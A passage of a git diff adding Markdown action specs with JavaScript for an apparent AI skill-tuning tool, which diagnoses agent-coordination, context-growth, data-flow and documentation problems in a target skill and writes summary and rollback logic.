outputFiles: [appliedFixesPath],
summary: `Applied fix ${fix.id}: ${success ? 'success' : 'partial'}, ${appliedChanges.length} files modified`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
applied_fixes: [...existingApplied, newAppliedFix],
pending_fixes: remainingPendingFixes
}
};
```
## Rollback Function
```javascript
async function rollbackFix(fixId, state, workDir) {
const appliedFix = state.applied_fixes.find(f => f.fix_id === fixId);
if (!appliedFix || !appliedFix.rollback_available) {
throw new Error(`Cannot rollback fix ${fixId}`);
}
const backupDir = appliedFix.backup_path;
const targetPath = state.target_skill.path;
// Restore from backup
const backupFiles = Glob(`${backupDir}/**/*`);
for (const backupFile of backupFiles) {
const relativePath = backupFile.replace(backupDir + '/', '');
const targetFile = `${targetPath}/${relativePath}`;
const content = Read(backupFile);
Write(targetFile, content);
}
return {
stateUpdates: {
applied_fixes: state.applied_fixes.map(f =>
f.fix_id === fixId
? { ...f, rollback_available: false, verification_result: 'rolled_back' }
: f
)
}
};
}
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File not found | Skip file, log warning |
| Write permission error | Retry with sudo or report |
| Backup creation failed | Abort fix, don't modify |
## Next Actions
- If pending_fixes.length > 0: action-apply-fix (continue)
- If all fixes applied: action-verify

View File

@@ -0,0 +1,195 @@
# Action: Complete
Finalize the tuning session with summary report and cleanup.
## Purpose
- Generate final summary report
- Record tuning statistics
- Clean up temporary files (optional)
- Provide recommendations for future maintenance
## Preconditions
- [ ] state.status === 'running'
- [ ] quality_gate === 'pass' OR max_iterations reached
## Execution
```javascript
async function execute(state, workDir) {
console.log('Finalizing skill tuning session...');
const targetSkill = state.target_skill;
const startTime = new Date(state.started_at);
const endTime = new Date();
const duration = Math.round((endTime - startTime) / 1000);
// Generate final summary
const summary = `# Skill Tuning Summary
**Target Skill**: ${targetSkill.name}
**Path**: ${targetSkill.path}
**Session Duration**: ${duration} seconds
**Completed**: ${endTime.toISOString()}
---
## Final Status
| Metric | Value |
|--------|-------|
| Final Health Score | ${state.quality_score}/100 |
| Quality Gate | ${state.quality_gate.toUpperCase()} |
| Total Iterations | ${state.iteration_count} |
| Issues Found | ${state.issues.length + state.applied_fixes.flatMap(f => f.issues_resolved || []).length} |
| Issues Resolved | ${state.applied_fixes.flatMap(f => f.issues_resolved || []).length} |
| Fixes Applied | ${state.applied_fixes.length} |
| Fixes Verified | ${state.applied_fixes.filter(f => f.verification_result === 'pass').length} |
---
## Diagnosis Summary
| Area | Issues Found | Severity |
|------|--------------|----------|
| Context Explosion | ${state.diagnosis.context?.issues_found || 'N/A'} | ${state.diagnosis.context?.severity || 'N/A'} |
| Long-tail Forgetting | ${state.diagnosis.memory?.issues_found || 'N/A'} | ${state.diagnosis.memory?.severity || 'N/A'} |
| Data Flow | ${state.diagnosis.dataflow?.issues_found || 'N/A'} | ${state.diagnosis.dataflow?.severity || 'N/A'} |
| Agent Coordination | ${state.diagnosis.agent?.issues_found || 'N/A'} | ${state.diagnosis.agent?.severity || 'N/A'} |
---
## Applied Fixes
${state.applied_fixes.length === 0 ? '_No fixes applied_' :
state.applied_fixes.map((fix, i) => `
### ${i + 1}. ${fix.fix_id}
- **Applied At**: ${fix.applied_at}
- **Success**: ${fix.success ? 'Yes' : 'No'}
- **Verification**: ${fix.verification_result}
- **Rollback Available**: ${fix.rollback_available ? 'Yes' : 'No'}
`).join('\n')}
---
## Remaining Issues
${state.issues.length === 0 ? '✅ All issues resolved!' :
`${state.issues.length} issues remain:\n\n` +
state.issues.map(issue =>
`- **[${issue.severity.toUpperCase()}]** ${issue.description} (${issue.id})`
).join('\n')}
---
## Recommendations
${generateRecommendations(state)}
---
## Backup Information
Original skill files backed up to:
\`${state.backup_dir}\`
To restore original skill:
\`\`\`bash
cp -r "${state.backup_dir}/${targetSkill.name}-backup"/* "${targetSkill.path}/"
\`\`\`
---
## Session Files
| File | Description |
|------|-------------|
| ${workDir}/tuning-report.md | Full diagnostic report |
| ${workDir}/diagnosis/*.json | Individual diagnosis results |
| ${workDir}/fixes/fix-proposals.json | Proposed fixes |
| ${workDir}/fixes/applied-fixes.json | Applied fix history |
| ${workDir}/tuning-summary.md | This summary |
---
*Skill tuning completed by skill-tuning*
`;
Write(`${workDir}/tuning-summary.md`, summary);
// Update final state
return {
stateUpdates: {
status: 'completed',
completed_at: endTime.toISOString()
},
outputFiles: [`${workDir}/tuning-summary.md`],
summary: `Tuning complete: ${state.quality_gate} with ${state.quality_score}/100 health score`
};
}
function generateRecommendations(state) {
const recommendations = [];
// Based on remaining issues
if (state.issues.some(i => i.type === 'context_explosion')) {
recommendations.push('- **Context Management**: Consider implementing a context summarization agent to prevent token growth');
}
if (state.issues.some(i => i.type === 'memory_loss')) {
recommendations.push('- **Constraint Tracking**: Add explicit constraint injection to each phase prompt');
}
if (state.issues.some(i => i.type === 'dataflow_break')) {
recommendations.push('- **State Centralization**: Migrate to single state.json with schema validation');
}
if (state.issues.some(i => i.type === 'agent_failure')) {
recommendations.push('- **Error Handling**: Wrap all Task calls in try-catch blocks');
}
// General recommendations
if (state.iteration_count >= state.max_iterations) {
recommendations.push('- **Deep Refactoring**: Consider architectural review if issues persist after multiple iterations');
}
if (state.quality_score < 80) {
recommendations.push('- **Regular Tuning**: Schedule periodic skill-tuning runs to catch issues early');
}
if (recommendations.length === 0) {
recommendations.push('- Skill is in good health! Monitor for regressions during future development.');
}
return recommendations.join('\n');
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'completed',
completed_at: '<timestamp>'
}
};
```
## Output
- **File**: `tuning-summary.md`
- **Location**: `${workDir}/tuning-summary.md`
- **Format**: Markdown
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Summary write failed | Write to alternative location |
## Next Actions
- None (terminal state)

View File

@@ -0,0 +1,317 @@
# Action: Diagnose Agent Coordination
Analyze target skill for agent coordination failures - call chain fragility and result passing issues.
## Purpose
- Detect fragile agent call patterns
- Identify result passing issues
- Find missing error handling in agent calls
- Analyze agent return format consistency
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'agent' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Unhandled Agent Failures
```regex
# Task calls without try-catch or error handling
/Task\s*\(\s*\{[^}]*\}\s*\)(?![^;]*catch)/
```
### Pattern 2: Missing Return Validation
```regex
# Agent result used directly without validation
/const\s+\w+\s*=\s*await?\s*Task\([^)]+\);\s*(?!.*(?:if|try|JSON\.parse))/
```
### Pattern 3: Inconsistent Agent Configuration
```regex
# Different agent configurations in same skill
/subagent_type:\s*['"](\w+)['"]/g
```
### Pattern 4: Deeply Nested Agent Calls
```regex
# Agent calling another agent (nested)
/Task\s*\([^)]*prompt:[^)]*Task\s*\(/
```
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing agent coordination in ${skillPath}...`);
// 1. Find all Task/agent calls
const allFiles = Glob(`${skillPath}/**/*.md`);
const agentCalls = [];
const agentTypes = new Set();
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find Task calls
const taskMatches = content.matchAll(/Task\s*\(\s*\{([^}]+)\}/g);
for (const match of taskMatches) {
const config = match[1];
// Extract agent type
const typeMatch = config.match(/subagent_type:\s*['"]([^'"]+)['"]/);
const agentType = typeMatch ? typeMatch[1] : 'unknown';
agentTypes.add(agentType);
// Check for error handling context
const hasErrorHandling = /try\s*\{.*Task|\.catch\(|await\s+Task.*\.then/s.test(
content.slice(Math.max(0, match.index - 100), match.index + match[0].length + 100)
);
// Check for result validation
const hasResultValidation = /JSON\.parse|if\s*\(\s*result|result\s*\?\./s.test(
content.slice(match.index, match.index + match[0].length + 200)
);
// Check for background execution
const runsInBackground = /run_in_background:\s*true/.test(config);
agentCalls.push({
file: relativePath,
agentType,
hasErrorHandling,
hasResultValidation,
runsInBackground,
config: config.slice(0, 200)
});
}
}
// 2. Analyze agent call patterns
const totalCalls = agentCalls.length;
const callsWithoutErrorHandling = agentCalls.filter(c => !c.hasErrorHandling);
const callsWithoutValidation = agentCalls.filter(c => !c.hasResultValidation);
// Issue: Missing error handling
if (callsWithoutErrorHandling.length > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: callsWithoutErrorHandling.length > 2 ? 'high' : 'medium',
location: { file: 'multiple' },
description: `${callsWithoutErrorHandling.length}/${totalCalls} agent calls lack error handling`,
evidence: callsWithoutErrorHandling.slice(0, 3).map(c =>
`${c.file}: ${c.agentType}`
),
root_cause: 'Agent failures not caught, may crash workflow',
impact: 'Unhandled agent errors cause cascading failures',
suggested_fix: 'Wrap Task calls in try-catch with graceful fallback'
});
evidence.push({
file: 'multiple',
pattern: 'missing_error_handling',
context: `${callsWithoutErrorHandling.length} calls affected`,
severity: 'high'
});
}
// Issue: Missing result validation
if (callsWithoutValidation.length > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'multiple' },
description: `${callsWithoutValidation.length}/${totalCalls} agent calls lack result validation`,
evidence: callsWithoutValidation.slice(0, 3).map(c =>
`${c.file}: ${c.agentType} result not validated`
),
root_cause: 'Agent results used directly without type checking',
impact: 'Invalid agent output may corrupt state',
suggested_fix: 'Add JSON.parse with try-catch and schema validation'
});
}
// 3. Check for inconsistent agent types usage
if (agentTypes.size > 3 && state.target_skill.execution_mode === 'autonomous') {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'low',
location: { file: 'multiple' },
description: `Using ${agentTypes.size} different agent types`,
evidence: [...agentTypes].slice(0, 5),
root_cause: 'Multiple agent types increase coordination complexity',
impact: 'Different agent behaviors may cause inconsistency',
suggested_fix: 'Standardize on fewer agent types with clear roles'
});
}
// 4. Check for nested agent calls
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Detect nested Task calls
const hasNestedTask = /Task\s*\([^)]*prompt:[^)]*Task\s*\(/s.test(content);
if (hasNestedTask) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'high',
location: { file: relativePath },
description: 'Nested agent calls detected',
evidence: ['Agent prompt contains another Task call'],
root_cause: 'Agent calls another agent, creating deep nesting',
impact: 'Context explosion, hard to debug, unpredictable behavior',
suggested_fix: 'Flatten agent calls, use orchestrator to coordinate'
});
}
}
// 5. Check SKILL.md for agent configuration consistency
const skillMd = Read(`${skillPath}/SKILL.md`);
// Check if allowed-tools includes Task
const allowedTools = skillMd.match(/allowed-tools:\s*([^\n]+)/i);
if (allowedTools && !allowedTools[1].includes('Task') && totalCalls > 0) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'SKILL.md' },
description: 'Task tool used but not declared in allowed-tools',
evidence: [`${totalCalls} Task calls found, but Task not in allowed-tools`],
root_cause: 'Tool declaration mismatch',
impact: 'May cause runtime permission issues',
suggested_fix: 'Add Task to allowed-tools in SKILL.md front matter'
});
}
// 6. Check for agent result format consistency
const returnFormats = new Set();
for (const file of allFiles) {
const content = Read(file);
// Look for return format definitions
const returnMatch = content.match(/\[RETURN\][^[]*|return\s*\{[^}]+\}/gi);
if (returnMatch) {
returnMatch.forEach(r => {
const format = r.includes('JSON') ? 'json' :
r.includes('summary') ? 'summary' :
r.includes('file') ? 'file_path' : 'other';
returnFormats.add(format);
});
}
}
if (returnFormats.size > 2) {
issues.push({
id: `AGT-${issues.length + 1}`,
type: 'agent_failure',
severity: 'medium',
location: { file: 'multiple' },
description: 'Inconsistent agent return formats',
evidence: [...returnFormats],
root_cause: 'Different agents return data in different formats',
impact: 'Orchestrator must handle multiple format types',
suggested_fix: 'Standardize return format: {status, output_file, summary}'
});
}
// 7. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 1 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 8. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'error_handling',
'result_validation',
'agent_type_consistency',
'nested_calls',
'return_format_consistency'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
agent_analysis: {
total_agent_calls: totalCalls,
unique_agent_types: agentTypes.size,
calls_without_error_handling: callsWithoutErrorHandling.length,
calls_without_validation: callsWithoutValidation.length,
agent_types_used: [...agentTypes]
},
recommendations: [
callsWithoutErrorHandling.length > 0
? 'Add try-catch to all Task calls' : null,
callsWithoutValidation.length > 0
? 'Add result validation with JSON.parse and schema check' : null,
agentTypes.size > 3
? 'Consolidate agent types for consistency' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/agent-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.agent': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/agent-diagnosis.json`],
summary: `Agent diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.agent': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Regex match error | Use simpler patterns |
| File access error | Skip and continue |
## Next Actions
- Success: action-generate-report
- Skipped: If 'agent' not in focus_areas

View File

@@ -0,0 +1,243 @@
# Action: Diagnose Context Explosion
Analyze target skill for context explosion issues - token accumulation and multi-turn dialogue bloat.
## Purpose
- Detect patterns that cause context growth
- Identify multi-turn accumulation points
- Find missing context compression mechanisms
- Measure potential token waste
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'context' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Unbounded History Accumulation
```regex
# Patterns that suggest history accumulation
/\bhistory\b.*\.push\b/
/\bmessages\b.*\.concat\b/
/\bconversation\b.*\+=\b/
/\bappend.*context\b/i
```
### Pattern 2: Full Content Passing
```regex
# Patterns that pass full content instead of references
/Read\([^)]+\).*\+.*Read\(/
/JSON\.stringify\(.*state\)/ # Full state serialization
/\$\{.*content\}/ # Template literal with full content
```
### Pattern 3: Missing Summarization
```regex
# Absence of compression/summarization
# Check for lack of: summarize, compress, truncate, slice
```
### Pattern 4: Agent Return Bloat
```regex
# Agent returning full content instead of path + summary
/return\s*\{[^}]*content:/
/return.*JSON\.stringify/
```
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing context explosion in ${skillPath}...`);
// 1. Scan all phase files
const phaseFiles = Glob(`${skillPath}/phases/**/*.md`);
for (const file of phaseFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Check Pattern 1: History accumulation
const historyPatterns = [
/history\s*[.=].*push|concat|append/gi,
/messages\s*=\s*\[.*\.\.\..*messages/gi,
/conversation.*\+=/gi
];
for (const pattern of historyPatterns) {
const matches = content.match(pattern);
if (matches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'high',
location: { file: relativePath },
description: 'Unbounded history accumulation detected',
evidence: matches.slice(0, 3),
root_cause: 'History/messages array grows without bounds',
impact: 'Token count increases linearly with iterations',
suggested_fix: 'Implement sliding window or summarization'
});
evidence.push({
file: relativePath,
pattern: 'history_accumulation',
context: matches[0],
severity: 'high'
});
}
}
// Check Pattern 2: Full content passing
const contentPatterns = [
/Read\s*\([^)]+\)\s*[\+,]/g,
/JSON\.stringify\s*\(\s*state\s*\)/g,
/\$\{[^}]*content[^}]*\}/g
];
for (const pattern of contentPatterns) {
const matches = content.match(pattern);
if (matches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'medium',
location: { file: relativePath },
description: 'Full content passed instead of reference',
evidence: matches.slice(0, 3),
root_cause: 'Entire file/state content included in prompts',
impact: 'Unnecessary token consumption',
suggested_fix: 'Pass file paths and summaries instead of full content'
});
evidence.push({
file: relativePath,
pattern: 'full_content_passing',
context: matches[0],
severity: 'medium'
});
}
}
// Check Pattern 3: Missing summarization
const hasSummarization = /summariz|compress|truncat|slice.*context/i.test(content);
const hasLongPrompts = content.length > 5000;
if (hasLongPrompts && !hasSummarization) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'medium',
location: { file: relativePath },
description: 'Long phase file without summarization mechanism',
evidence: [`File length: ${content.length} chars`],
root_cause: 'No context compression for large content',
impact: 'Potential token overflow in long sessions',
suggested_fix: 'Add context summarization before passing to agents'
});
}
// Check Pattern 4: Agent return bloat
const returnPatterns = /return\s*\{[^}]*(?:content|full_output|complete_result):/g;
const returnMatches = content.match(returnPatterns);
if (returnMatches) {
issues.push({
id: `CTX-${issues.length + 1}`,
type: 'context_explosion',
severity: 'high',
location: { file: relativePath },
description: 'Agent returns full content instead of path+summary',
evidence: returnMatches.slice(0, 3),
root_cause: 'Agent output includes complete content',
impact: 'Context bloat when orchestrator receives full output',
suggested_fix: 'Return {output_file, summary} instead of {content}'
});
}
}
// 2. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 2 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 3. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'history_accumulation',
'full_content_passing',
'missing_summarization',
'agent_return_bloat'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
recommendations: [
issues.length > 0 ? 'Implement context summarization agent' : null,
highCount > 0 ? 'Add sliding window for conversation history' : null,
evidence.some(e => e.pattern === 'full_content_passing')
? 'Refactor to pass file paths instead of content' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/context-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.context': diagnosisResult,
issues: [...state.issues, ...issues],
'issues_by_severity.critical': state.issues_by_severity.critical + criticalCount,
'issues_by_severity.high': state.issues_by_severity.high + highCount
},
outputFiles: [`${workDir}/diagnosis/context-diagnosis.json`],
summary: `Context diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.context': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File read error | Skip file, log warning |
| Pattern matching error | Use fallback patterns |
| Write error | Retry to alternative path |
## Next Actions
- Success: action-diagnose-memory (or next in focus_areas)
- Skipped: If 'context' not in focus_areas

View File

@@ -0,0 +1,318 @@
# Action: Diagnose Data Flow Issues
Analyze target skill for data flow disruption - state inconsistencies and format variations.
## Purpose
- Detect inconsistent data formats between phases
- Identify scattered state storage
- Find missing data contracts
- Measure state transition integrity
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'dataflow' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Multiple Storage Locations
```regex
# Data written to multiple paths without centralization
/Write\s*\(\s*[`'"][^`'"]+[`'"]/g
```
### Pattern 2: Inconsistent Field Names
```regex
# Same concept with different names: title/name, id/identifier
```
### Pattern 3: Missing Schema Validation
```regex
# Absence of validation before state write
# Look for lack of: validate, schema, check, verify
```
### Pattern 4: Format Transformation Without Normalization
```regex
# Direct JSON.parse without error handling or normalization
/JSON\.parse\([^)]+\)(?!\s*\|\|)/
```
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing data flow in ${skillPath}...`);
// 1. Collect all Write operations to map data storage
const allFiles = Glob(`${skillPath}/**/*.md`);
const writeLocations = [];
const readLocations = [];
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find Write operations
const writeMatches = content.matchAll(/Write\s*\(\s*[`'"]([^`'"]+)[`'"]/g);
for (const match of writeMatches) {
writeLocations.push({
file: relativePath,
target: match[1],
isStateFile: match[1].includes('state.json') || match[1].includes('config.json')
});
}
// Find Read operations
const readMatches = content.matchAll(/Read\s*\(\s*[`'"]([^`'"]+)[`'"]/g);
for (const match of readMatches) {
readLocations.push({
file: relativePath,
source: match[1]
});
}
}
// 2. Check for scattered state storage
const stateTargets = writeLocations
.filter(w => w.isStateFile)
.map(w => w.target);
const uniqueStateFiles = [...new Set(stateTargets)];
if (uniqueStateFiles.length > 2) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'high',
location: { file: 'multiple' },
description: `State stored in ${uniqueStateFiles.length} different locations`,
evidence: uniqueStateFiles.slice(0, 5),
root_cause: 'No centralized state management',
impact: 'State inconsistency between phases',
suggested_fix: 'Centralize state to single state.json with state manager'
});
evidence.push({
file: 'multiple',
pattern: 'scattered_state',
context: uniqueStateFiles.join(', '),
severity: 'high'
});
}
// 3. Check for inconsistent field naming
const fieldNamePatterns = {
'name_vs_title': [/\.name\b/, /\.title\b/],
'id_vs_identifier': [/\.id\b/, /\.identifier\b/],
'status_vs_state': [/\.status\b/, /\.state\b/],
'error_vs_errors': [/\.error\b/, /\.errors\b/]
};
const fieldUsage = {};
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
for (const [patternName, patterns] of Object.entries(fieldNamePatterns)) {
for (const pattern of patterns) {
if (pattern.test(content)) {
if (!fieldUsage[patternName]) fieldUsage[patternName] = [];
fieldUsage[patternName].push({
file: relativePath,
pattern: pattern.toString()
});
}
}
}
}
for (const [patternName, usages] of Object.entries(fieldUsage)) {
const uniquePatterns = [...new Set(usages.map(u => u.pattern))];
if (uniquePatterns.length > 1) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'medium',
location: { file: 'multiple' },
description: `Inconsistent field naming: ${patternName.replace('_vs_', ' vs ')}`,
evidence: usages.slice(0, 3).map(u => `${u.file}: ${u.pattern}`),
root_cause: 'Same concept referred to with different field names',
impact: 'Data may be lost during field access',
suggested_fix: `Standardize to single field name, add normalization function`
});
}
}
// 4. Check for missing schema validation
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find JSON.parse without validation
const unsafeParses = content.match(/JSON\.parse\s*\([^)]+\)(?!\s*\?\?|\s*\|\|)/g);
const hasValidation = /validat|schema|type.*check/i.test(content);
if (unsafeParses && unsafeParses.length > 0 && !hasValidation) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'medium',
location: { file: relativePath },
description: 'JSON parsing without validation',
evidence: unsafeParses.slice(0, 2),
root_cause: 'No schema validation after parsing',
impact: 'Invalid data may propagate through phases',
suggested_fix: 'Add schema validation after JSON.parse'
});
}
}
// 5. Check state schema if exists
const stateSchemaFile = Glob(`${skillPath}/phases/state-schema.md`)[0];
if (stateSchemaFile) {
const schemaContent = Read(stateSchemaFile);
// Check for type definitions
const hasTypeScript = /interface\s+\w+|type\s+\w+\s*=/i.test(schemaContent);
const hasValidationFunction = /function\s+validate|validateState/i.test(schemaContent);
if (hasTypeScript && !hasValidationFunction) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'low',
location: { file: 'phases/state-schema.md' },
description: 'Type definitions without runtime validation',
evidence: ['TypeScript interfaces defined but no validation function'],
root_cause: 'Types are compile-time only, not enforced at runtime',
impact: 'Schema violations may occur at runtime',
suggested_fix: 'Add validateState() function using Zod or manual checks'
});
}
} else if (state.target_skill.execution_mode === 'autonomous') {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'high',
location: { file: 'phases/' },
description: 'Autonomous skill missing state-schema.md',
evidence: ['No state schema definition found'],
root_cause: 'State structure undefined for orchestrator',
impact: 'Inconsistent state handling across actions',
suggested_fix: 'Create phases/state-schema.md with explicit type definitions'
});
}
// 6. Check read-write alignment
const writtenFiles = new Set(writeLocations.map(w => w.target));
const readFiles = new Set(readLocations.map(r => r.source));
const writtenButNotRead = [...writtenFiles].filter(f =>
!readFiles.has(f) && !f.includes('output') && !f.includes('report')
);
if (writtenButNotRead.length > 0) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'low',
location: { file: 'multiple' },
description: 'Files written but never read',
evidence: writtenButNotRead.slice(0, 3),
root_cause: 'Orphaned output files',
impact: 'Wasted storage and potential confusion',
suggested_fix: 'Remove unused writes or add reads where needed'
});
}
// 7. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 1 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 8. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'scattered_state',
'inconsistent_naming',
'missing_validation',
'read_write_alignment'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
data_flow_map: {
write_locations: writeLocations.length,
read_locations: readLocations.length,
unique_state_files: uniqueStateFiles.length
},
recommendations: [
uniqueStateFiles.length > 2 ? 'Implement centralized state manager' : null,
issues.some(i => i.description.includes('naming'))
? 'Create normalization layer for field names' : null,
issues.some(i => i.description.includes('validation'))
? 'Add Zod or JSON Schema validation' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/dataflow-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.dataflow': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/dataflow-diagnosis.json`],
summary: `Data flow diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.dataflow': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Glob pattern error | Use fallback patterns |
| File read error | Skip and continue |
## Next Actions
- Success: action-diagnose-agent (or next in focus_areas)
- Skipped: If 'dataflow' not in focus_areas

View File

@@ -0,0 +1,299 @@
# Action: Diagnose Documentation Structure
检测目标 skill 中的文档冗余和冲突问题。
## Purpose
- 检测重复定义State Schema、映射表、类型定义等
- 检测冲突定义(优先级定义不一致、实现与文档漂移等)
- 生成合并和解决冲突的建议
## Preconditions
- [ ] `state.status === 'running'`
- [ ] `state.target_skill !== null`
- [ ] `!state.diagnosis.docs`
- [ ] 用户指定 focus_areas 包含 'docs' 或 'all',或需要全面诊断
## Detection Patterns
### DOC-RED-001: 核心定义重复
检测 State Schema、核心接口等在多处定义
```javascript
async function detectDefinitionDuplicates(skillPath) {
const patterns = [
{ name: 'state_schema', regex: /interface\s+(TuningState|State)\s*\{/g },
{ name: 'fix_strategy', regex: /type\s+FixStrategy\s*=/g },
{ name: 'issue_type', regex: /type:\s*['"]?(context_explosion|memory_loss|dataflow_break)/g }
];
const files = Glob('**/*.md', { cwd: skillPath });
const duplicates = [];
for (const pattern of patterns) {
const matches = [];
for (const file of files) {
const content = Read(`${skillPath}/${file}`);
if (pattern.regex.test(content)) {
matches.push({ file, pattern: pattern.name });
}
}
if (matches.length > 1) {
duplicates.push({
type: pattern.name,
files: matches.map(m => m.file),
severity: 'high'
});
}
}
return duplicates;
}
```
### DOC-RED-002: 硬编码配置重复
检测 action 文件中硬编码与 spec 文档的重复:
```javascript
async function detectHardcodedDuplicates(skillPath) {
const actionFiles = Glob('phases/actions/*.md', { cwd: skillPath });
const specFiles = Glob('specs/*.md', { cwd: skillPath });
const duplicates = [];
for (const actionFile of actionFiles) {
const content = Read(`${skillPath}/${actionFile}`);
// 检测硬编码的映射对象
const hardcodedPatterns = [
/const\s+\w*[Mm]apping\s*=\s*\{/g,
/patternMapping\s*=\s*\{/g,
/strategyMapping\s*=\s*\{/g
];
for (const pattern of hardcodedPatterns) {
if (pattern.test(content)) {
duplicates.push({
type: 'hardcoded_mapping',
file: actionFile,
description: '硬编码映射可能与 specs/ 中的定义重复',
severity: 'high'
});
}
}
}
return duplicates;
}
```
### DOC-CON-001: 优先级定义冲突
检测 P0-P3 等优先级在不同文件中的定义不一致:
```javascript
async function detectPriorityConflicts(skillPath) {
const files = Glob('**/*.md', { cwd: skillPath });
const priorityDefs = {};
const priorityPattern = /\*\*P(\d+)\*\*[:\s]+([^\|]+)/g;
for (const file of files) {
const content = Read(`${skillPath}/${file}`);
let match;
while ((match = priorityPattern.exec(content)) !== null) {
const priority = `P${match[1]}`;
const definition = match[2].trim();
if (!priorityDefs[priority]) {
priorityDefs[priority] = [];
}
priorityDefs[priority].push({ file, definition });
}
}
const conflicts = [];
for (const [priority, defs] of Object.entries(priorityDefs)) {
const uniqueDefs = [...new Set(defs.map(d => d.definition))];
if (uniqueDefs.length > 1) {
conflicts.push({
key: priority,
definitions: defs,
severity: 'critical'
});
}
}
return conflicts;
}
```
### DOC-CON-002: 实现与文档漂移
检测硬编码与文档表格的不一致:
```javascript
async function detectImplementationDrift(skillPath) {
